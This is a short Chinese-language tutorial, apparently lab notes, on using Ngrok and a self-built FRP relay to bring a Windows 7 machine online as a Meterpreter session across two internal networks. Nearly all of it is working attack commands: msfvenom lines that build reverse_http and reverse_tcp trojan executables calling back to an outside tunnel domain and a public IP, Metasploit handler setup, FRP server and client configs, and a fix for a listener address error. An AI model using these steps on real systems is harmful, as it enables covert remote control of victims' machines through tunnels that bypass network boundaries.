内网穿透Ngrok测试演示-两个内网通讯上线
注册--登录--开通
创建隧道
kali: rz linux_adm64.zip unzip linux_adm64.zip cd linux_adm64 ./sunny clientid 287c524d766279d9
生成监听木马 上传到win7
msfvenom -p windows/meterpreter/reverse_http lhost=ajie.free.idcfengye.com lport=80 -f exe -o test.exe use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 127.0.0.1 set lport 80 exploit
服务器已经接收到了请求 msf报错了
仔细检测了一下 代理的ip 不能写127.0.0.1 应该写成本地的192.168.0.104
重新下载开通一个 ip改过来就可以获取会话了。
内网穿透Frp自建跳板测试-两个内网通讯上线
https://github.com/fatedier/frp/releases
1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口) 服务器修改配置文件frps.ini: [common] bind_port = 443 启动服务端: ./frps -c ./frps.ini 2.控制端-下载-解压-修改-启动 控制端修改配置文件frpc.ini: [common] server_addr = 120.25.205.228 server_port = 443 #frpc工作端口,必须和上面frps保持一致 [msf] type = tcp local_ip = 127.0.0.1 local_port = 80 #转发给本机的80 remote_port = 8080 #服务端用8080端口转发给本机 启动客户端: ./frpc -c ./frpc.ini msfvenom -p windows/meterpreter/reverse_tcp lhost=120.25.205.228 lport=8080 -f exe -o frp.exe use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 127.0.0.1 set LPORT 80 exploit 3.靶机运行frp即可